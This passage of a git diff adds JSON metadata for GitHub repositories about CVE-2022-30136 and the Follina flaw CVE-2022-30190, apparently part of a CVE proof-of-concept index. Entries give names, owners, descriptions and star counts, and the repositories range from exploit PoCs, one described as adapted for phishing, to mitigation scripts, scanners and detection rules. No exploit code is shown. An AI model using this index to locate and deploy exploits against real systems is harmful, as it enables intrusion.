"2022-12-07T19:21:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30136.json b/2022/CVE-2022-30136.json new file mode 100644 index 0000000000..59e16b9516 --- /dev/null +++ b/2022/CVE-2022-30136.json @@ -0,0 +1,64 @@ +[ + { + "id": 614321236, + "name": "CVE-2022-30136", + "full_name": "fortra\/CVE-2022-30136", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2022-30136", + "description": "Windows Network File System Remote exploit for CVE-2022-30136", + "fork": false, + "created_at": "2023-03-15T10:59:08Z", + "updated_at": "2024-10-21T10:38:41Z", + "pushed_at": "2023-07-11T16:57:26Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 657715461, + "name": "CVE-2022-30136", + "full_name": "AXRoux\/CVE-2022-30136", + "owner": { + "login": "AXRoux", + "id": 103153079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103153079?v=4", + "html_url": "https:\/\/github.com\/AXRoux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AXRoux\/CVE-2022-30136", + "description": "Windows Network File System Remote exploit (DoS) PoC", + "fork": false, + "created_at": "2023-06-23T17:13:22Z", + "updated_at": "2023-06-26T07:07:36Z", + "pushed_at": "2023-06-23T17:14:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30190.json b/2022/CVE-2022-30190.json new file mode 100644 index 0000000000..1477543457 --- /dev/null +++ b/2022/CVE-2022-30190.json @@ -0,0 +1,2716 @@ +[ + { + "id": 498052694, + "name": "PoC-CVE-2022-30190", + "full_name": "JMousqueton\/PoC-CVE-2022-30190", + "owner": { + "login": "JMousqueton", + "id": 4148567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4148567?v=4", + "html_url": "https:\/\/github.com\/JMousqueton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JMousqueton\/PoC-CVE-2022-30190", + "description": "POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina", + "fork": false, + "created_at": "2022-05-30T18:17:38Z", + "updated_at": "2024-11-24T13:54:06Z", + "pushed_at": "2022-06-05T21:06:13Z", + "stargazers_count": 154, + "watchers_count": 154, + "has_discussions": false, + "forks_count": 57, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "follina", + "msoffice", + "poc", + "proof-of-concept", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 57, + "watchers": 154, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 498154711, + "name": "msdt-follina-office-rce", + "full_name": "zkl21hoang\/msdt-follina-office-rce", + "owner": { + "login": "zkl21hoang", + "id": 75946931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75946931?v=4", + "html_url": "https:\/\/github.com\/zkl21hoang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zkl21hoang\/msdt-follina-office-rce", + "description": "CVE-2022-30190", + "fork": false, + "created_at": "2022-05-31T02:03:46Z", + "updated_at": "2022-11-26T08:36:07Z", + "pushed_at": "2022-06-02T08:20:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498218229, + "name": "CVE-2022-30190", + "full_name": "onecloudemoji\/CVE-2022-30190", + "owner": { + "login": "onecloudemoji", + "id": 46857300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46857300?v=4", + "html_url": "https:\/\/github.com\/onecloudemoji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/onecloudemoji\/CVE-2022-30190", + "description": "CVE-2022-30190 Follina POC", + "fork": false, + "created_at": "2022-05-31T06:45:25Z", + "updated_at": "2024-09-09T11:51:09Z", + "pushed_at": "2022-05-31T09:35:37Z", + "stargazers_count": 106, + "watchers_count": 106, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 106, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 498253545, + "name": "CVE-2022-30190", + "full_name": "2867a0\/CVE-2022-30190", + "owner": { + "login": "2867a0", + "id": 42805417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42805417?v=4", + "html_url": "https:\/\/github.com\/2867a0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/2867a0\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-05-31T08:39:09Z", + "updated_at": "2022-06-01T23:05:08Z", + "pushed_at": "2022-05-31T08:43:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 498322212, + "name": "CVE-2022-30190", + "full_name": "doocop\/CVE-2022-30190", + "owner": { + "login": "doocop", + "id": 52679771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52679771?v=4", + "html_url": "https:\/\/github.com\/doocop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doocop\/CVE-2022-30190", + "description": "Microsoft Office Word Rce 复现(CVE-2022-30190)", + "fork": false, + "created_at": "2022-05-31T12:15:18Z", + "updated_at": "2024-11-25T04:47:09Z", + "pushed_at": "2022-05-31T12:27:50Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 59, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 498363809, + "name": "MSDT_CVE-2022-30190", + "full_name": "archanchoudhury\/MSDT_CVE-2022-30190", + "owner": { + "login": "archanchoudhury", + "id": 51078911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51078911?v=4", + "html_url": "https:\/\/github.com\/archanchoudhury", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/archanchoudhury\/MSDT_CVE-2022-30190", + "description": "This Repository Talks about the Follina MSDT from Defender Perspective", + "fork": false, + "created_at": "2022-05-31T14:10:11Z", + "updated_at": "2024-06-20T18:45:01Z", + "pushed_at": "2022-06-02T09:12:54Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498379315, + "name": "cve-2022-30190", + "full_name": "rickhenderson\/cve-2022-30190", + "owner": { + "login": "rickhenderson", + "id": 4127791, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4127791?v=4", + "html_url": "https:\/\/github.com\/rickhenderson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rickhenderson\/cve-2022-30190", + "description": "Aka Follina = benign POC.", + "fork": false, + "created_at": "2022-05-31T14:50:55Z", + "updated_at": "2022-06-30T03:54:18Z", + "pushed_at": "2022-05-31T15:59:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498408278, + "name": "CVE-2022-30190-ASR-Senintel-Process-Pickup", + "full_name": "DOV3Y\/CVE-2022-30190-ASR-Senintel-Process-Pickup", + "owner": { + "login": "DOV3Y", + "id": 89396131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89396131?v=4", + "html_url": "https:\/\/github.com\/DOV3Y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DOV3Y\/CVE-2022-30190-ASR-Senintel-Process-Pickup", + "description": "Picking up processes that have triggered ASR related to CVE-2022-30190", + "fork": false, + "created_at": "2022-05-31T16:11:14Z", + "updated_at": "2022-05-31T16:11:14Z", + "pushed_at": "2022-05-31T16:15:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498441804, + "name": "msdt-CVE-2022-30190", + "full_name": "kdk2933\/msdt-CVE-2022-30190", + "owner": { + "login": "kdk2933", + "id": 31010136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31010136?v=4", + "html_url": "https:\/\/github.com\/kdk2933", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kdk2933\/msdt-CVE-2022-30190", + "description": "CVE-2022-30190- A Zero-Click RCE Vulnerability In MSDT", + "fork": false, + "created_at": "2022-05-31T17:54:20Z", + "updated_at": "2022-12-16T06:24:23Z", + "pushed_at": "2022-05-31T17:54:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498443788, + "name": "CVE-2022-30190", + "full_name": "sentinelblue\/CVE-2022-30190", + "owner": { + "login": "sentinelblue", + "id": 70291995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70291995?v=4", + "html_url": "https:\/\/github.com\/sentinelblue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sentinelblue\/CVE-2022-30190", + "description": "Microsoft Sentinel analytic rule and hunting queries in ASIM for activity of MSDT and CVE-2022-30190.", + "fork": false, + "created_at": "2022-05-31T18:00:42Z", + "updated_at": "2024-08-12T20:23:43Z", + "pushed_at": "2022-06-08T15:18:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "alerting", + "asim", + "cve-2022-30190", + "hunting", + "sentinel" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 498457928, + "name": "MSDT_CVE-2022-30190-follina-", + "full_name": "aymankhder\/MSDT_CVE-2022-30190-follina-", + "owner": { + "login": "aymankhder", + "id": 12251266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12251266?v=4", + "html_url": "https:\/\/github.com\/aymankhder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aymankhder\/MSDT_CVE-2022-30190-follina-", + "description": null, + "fork": false, + "created_at": "2022-05-31T18:45:34Z", + "updated_at": "2022-05-31T18:45:34Z", + "pushed_at": "2022-05-31T18:51:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498528729, + "name": "cve-2022-30190", + "full_name": "PaddlingCode\/cve-2022-30190", + "owner": { + "login": "PaddlingCode", + "id": 55930531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55930531?v=4", + "html_url": "https:\/\/github.com\/PaddlingCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PaddlingCode\/cve-2022-30190", + "description": "CVE-2022-30190 remediation via removal of ms-msdt from Windows registry", + "fork": false, + "created_at": "2022-05-31T23:32:33Z", + "updated_at": "2024-08-12T20:23:44Z", + "pushed_at": "2022-05-31T23:43:02Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 498663128, + "name": "gollina", + "full_name": "dwisiswant0\/gollina", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/gollina", + "description": "Follina MS-MSDT 0-day MS Office RCE (CVE-2022-30190) PoC in Go", + "fork": false, + "created_at": "2022-06-01T09:02:00Z", + "updated_at": "2024-11-16T19:54:57Z", + "pushed_at": "2022-06-01T09:31:58Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "follina", + "go", + "golang", + "ms-msdt" + ], + "visibility": "public", + "forks": 6, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 498686009, + "name": "CVE-2022-30190", + "full_name": "hscorpion\/CVE-2022-30190", + "owner": { + "login": "hscorpion", + "id": 22425159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22425159?v=4", + "html_url": "https:\/\/github.com\/hscorpion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hscorpion\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-01T10:13:16Z", + "updated_at": "2022-06-06T16:59:02Z", + "pushed_at": "2022-06-06T17:08:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498710957, + "name": "CVE-2022-30190-follina", + "full_name": "drgreenthumb93\/CVE-2022-30190-follina", + "owner": { + "login": "drgreenthumb93", + "id": 50826299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50826299?v=4", + "html_url": "https:\/\/github.com\/drgreenthumb93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drgreenthumb93\/CVE-2022-30190-follina", + "description": "Just another PoC for the new MSDT-Exploit", + "fork": false, + "created_at": "2022-06-01T11:37:08Z", + "updated_at": "2024-08-12T20:23:45Z", + "pushed_at": "2023-04-20T20:34:05Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 498780691, + "name": "CVE-2022-30190-POC", + "full_name": "mitespsoc\/CVE-2022-30190-POC", + "owner": { + "login": "mitespsoc", + "id": 105447645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105447645?v=4", + "html_url": "https:\/\/github.com\/mitespsoc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mitespsoc\/CVE-2022-30190-POC", + "description": null, + "fork": false, + "created_at": "2022-06-01T14:55:43Z", + "updated_at": "2024-08-12T20:23:44Z", + "pushed_at": "2022-06-01T15:41:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498808251, + "name": "MSDT-0-Day-CVE-2022-30190-Poc", + "full_name": "Vaisakhkm2625\/MSDT-0-Day-CVE-2022-30190-Poc", + "owner": { + "login": "Vaisakhkm2625", + "id": 68694876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68694876?v=4", + "html_url": "https:\/\/github.com\/Vaisakhkm2625", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vaisakhkm2625\/MSDT-0-Day-CVE-2022-30190-Poc", + "description": null, + "fork": false, + "created_at": "2022-06-01T16:11:33Z", + "updated_at": "2024-08-12T20:23:45Z", + "pushed_at": "2022-06-01T16:48:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498863365, + "name": "CVE-2022-30190-NSIS", + "full_name": "rouben\/CVE-2022-30190-NSIS", + "owner": { + "login": "rouben", + "id": 2985666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2985666?v=4", + "html_url": "https:\/\/github.com\/rouben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rouben\/CVE-2022-30190-NSIS", + "description": "An NSIS script that helps deploy and roll back the mitigation registry patch for CVE-2022-30190 as recommended by Microsoft", + "fork": false, + "created_at": "2022-06-01T18:58:07Z", + "updated_at": "2022-06-07T08:02:05Z", + "pushed_at": "2022-06-01T22:23:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "microsoft", + "msdt", + "nsis" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498888452, + "name": "Follina-Remediation", + "full_name": "Cosmo121\/Follina-Remediation", + "owner": { + "login": "Cosmo121", + "id": 3526206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3526206?v=4", + "html_url": "https:\/\/github.com\/Cosmo121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cosmo121\/Follina-Remediation", + "description": "Removes the ability for MSDT to run, in response to CVE-2022-30190 (Follina)", + "fork": false, + "created_at": "2022-06-01T20:26:56Z", + "updated_at": "2023-01-27T20:26:21Z", + "pushed_at": "2022-10-08T23:22:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 498904586, + "name": "CVE-2022-30190", + "full_name": "rayorole\/CVE-2022-30190", + "owner": { + "login": "rayorole", + "id": 87602506, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87602506?v=4", + "html_url": "https:\/\/github.com\/rayorole", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rayorole\/CVE-2022-30190", + "description": "CVE-2022-30190 or \"Follina\" 0day proof of concept", + "fork": false, + "created_at": "2022-06-01T21:33:18Z", + "updated_at": "2022-06-01T21:36:47Z", + "pushed_at": "2022-06-01T21:36:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498924006, + "name": "2022_PoC-MSDT-Follina-CVE-2022-30190", + "full_name": "ImproveCybersecurityJaro\/2022_PoC-MSDT-Follina-CVE-2022-30190", + "owner": { + "login": "ImproveCybersecurityJaro", + "id": 106711305, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106711305?v=4", + "html_url": "https:\/\/github.com\/ImproveCybersecurityJaro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ImproveCybersecurityJaro\/2022_PoC-MSDT-Follina-CVE-2022-30190", + "description": "Proof of Concept zu MSDT-Follina - CVE-2022-30190. ÜBERPRÜFUNG DER WIRKSAMKEIT VON MICROSOFT DEFNEDER IN DER JEWEILS AKTUELLSTEN WINDOWS 10 VERSION.", + "fork": false, + "created_at": "2022-06-01T23:07:26Z", + "updated_at": "2022-06-01T23:07:26Z", + "pushed_at": "2022-06-01T23:30:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498927734, + "name": "CVE-2022-30190", + "full_name": "sudoaza\/CVE-2022-30190", + "owner": { + "login": "sudoaza", + "id": 555365, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/555365?v=4", + "html_url": "https:\/\/github.com\/sudoaza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoaza\/CVE-2022-30190", + "description": "MS-MSDT Follina CVE-2022-30190 PoC document generator", + "fork": false, + "created_at": "2022-06-01T23:27:14Z", + "updated_at": "2024-08-12T20:23:46Z", + "pushed_at": "2022-06-01T23:30:26Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498968929, + "name": "msdt-disable", + "full_name": "gamingwithevets\/msdt-disable", + "owner": { + "login": "gamingwithevets", + "id": 88830673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88830673?v=4", + "html_url": "https:\/\/github.com\/gamingwithevets", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gamingwithevets\/msdt-disable", + "description": "MSDT protocol disabler (CVE-2022-30190 patch tool)", + "fork": false, + "created_at": "2022-06-02T02:47:34Z", + "updated_at": "2023-01-27T23:35:56Z", + "pushed_at": "2022-06-26T10:10:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499022838, + "name": "FollinaScanner", + "full_name": "ErrorNoInternet\/FollinaScanner", + "owner": { + "login": "ErrorNoInternet", + "id": 61157623, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61157623?v=4", + "html_url": "https:\/\/github.com\/ErrorNoInternet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ErrorNoInternet\/FollinaScanner", + "description": "A tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)", + "fork": false, + "created_at": "2022-06-02T06:45:19Z", + "updated_at": "2024-11-16T19:54:48Z", + "pushed_at": "2022-09-13T10:05:02Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "antivirus", + "cve-2022-30190", + "follina", + "golang", + "scanner", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 6, + "watchers": 24, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499027429, + "name": "CVE-2022-30190", + "full_name": "ITMarcin2211\/CVE-2022-30190", + "owner": { + "login": "ITMarcin2211", + "id": 60057530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60057530?v=4", + "html_url": "https:\/\/github.com\/ITMarcin2211", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ITMarcin2211\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-02T07:01:19Z", + "updated_at": "2023-07-26T14:55:24Z", + "pushed_at": "2022-06-02T07:04:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499073115, + "name": "mitigate-folina", + "full_name": "derco0n\/mitigate-folina", + "owner": { + "login": "derco0n", + "id": 13888192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13888192?v=4", + "html_url": "https:\/\/github.com\/derco0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/derco0n\/mitigate-folina", + "description": "Mitigates the \"Folina\"-ZeroDay (CVE-2022-30190)", + "fork": false, + "created_at": "2022-06-02T09:30:13Z", + "updated_at": "2022-06-09T12:18:29Z", + "pushed_at": "2022-06-08T05:57:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499127993, + "name": "CVE-2022-30190-follina-Office-MSDT-Fixed", + "full_name": "komomon\/CVE-2022-30190-follina-Office-MSDT-Fixed", + "owner": { + "login": "komomon", + "id": 52700174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52700174?v=4", + "html_url": "https:\/\/github.com\/komomon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/komomon\/CVE-2022-30190-follina-Office-MSDT-Fixed", + "description": "CVE-2022-30190-follina.py-修改版,可以自定义word模板,方便实战中钓鱼使用。", + "fork": false, + "created_at": "2022-06-02T12:33:18Z", + "updated_at": "2024-11-27T14:51:07Z", + "pushed_at": "2023-04-13T16:46:26Z", + "stargazers_count": 396, + "watchers_count": 396, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 396, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 499136019, + "name": "CVE-2022-30190", + "full_name": "gyaansastra\/CVE-2022-30190", + "owner": { + "login": "gyaansastra", + "id": 35690123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35690123?v=4", + "html_url": "https:\/\/github.com\/gyaansastra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gyaansastra\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-02T12:58:24Z", + "updated_at": "2024-08-12T20:23:47Z", + "pushed_at": "2022-06-02T13:00:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499137152, + "name": "CVE-2022-30190-Fix", + "full_name": "swaiist\/CVE-2022-30190-Fix", + "owner": { + "login": "swaiist", + "id": 67833362, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67833362?v=4", + "html_url": "https:\/\/github.com\/swaiist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swaiist\/CVE-2022-30190-Fix", + "description": null, + "fork": false, + "created_at": "2022-06-02T13:01:46Z", + "updated_at": "2023-01-09T11:28:21Z", + "pushed_at": "2022-12-16T15:09:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499151925, + "name": "CVE-2022-30190-Follina-Patch", + "full_name": "suenerve\/CVE-2022-30190-Follina-Patch", + "owner": { + "login": "suenerve", + "id": 91017265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91017265?v=4", + "html_url": "https:\/\/github.com\/suenerve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/suenerve\/CVE-2022-30190-Follina-Patch", + "description": "The CVE-2022-30190-follina Workarounds Patch", + "fork": false, + "created_at": "2022-06-02T13:43:20Z", + "updated_at": "2022-07-01T22:07:49Z", + "pushed_at": "2022-06-05T12:37:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "administrator", + "cmd", + "cve", + "cve-2022-30190", + "exe", + "microsoft", + "patch", + "program", + "py", + "python", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499192008, + "name": "ms-msdt-vulnerability-pdq-package", + "full_name": "castlesmadeofsand\/ms-msdt-vulnerability-pdq-package", + "owner": { + "login": "castlesmadeofsand", + "id": 50452151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50452151?v=4", + "html_url": "https:\/\/github.com\/castlesmadeofsand", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/castlesmadeofsand\/ms-msdt-vulnerability-pdq-package", + "description": "PDQ Package I created for CVE-2022-30190", + "fork": false, + "created_at": "2022-06-02T15:33:15Z", + "updated_at": "2023-01-27T22:19:43Z", + "pushed_at": "2022-06-08T21:04:55Z", + "stargazers_count": 0, + "watchers_count": 0, + 